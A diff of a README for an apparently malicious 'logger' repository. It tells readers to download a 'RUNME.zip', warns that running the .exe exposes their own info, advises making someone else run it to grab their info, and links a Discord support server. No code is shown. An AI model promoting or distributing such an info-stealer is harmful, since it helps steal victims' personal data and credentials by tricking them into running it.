PhoenixH2011H/G0DL1K3-LOGGERS/README.md

 # G0DL1K3-LOGGERS
-**Download the "RUNME.zip" file and ignore the README.md, That is the text you are currently reading, not everything as a zip It has a high chance of breaking**
+**Download the "RUNME.zip" file and ignore the README.md, That is the text you are currently reading, not everything as a zip It has a high chance of breaking.**
 DO NOT RUN THE .EXE IF YOU WANT YOUR INFO SAFE (if your grabbing someone elses info, Make them run the .exe file)

 Support server: 'https://discord.gg/D2brFzqzA4'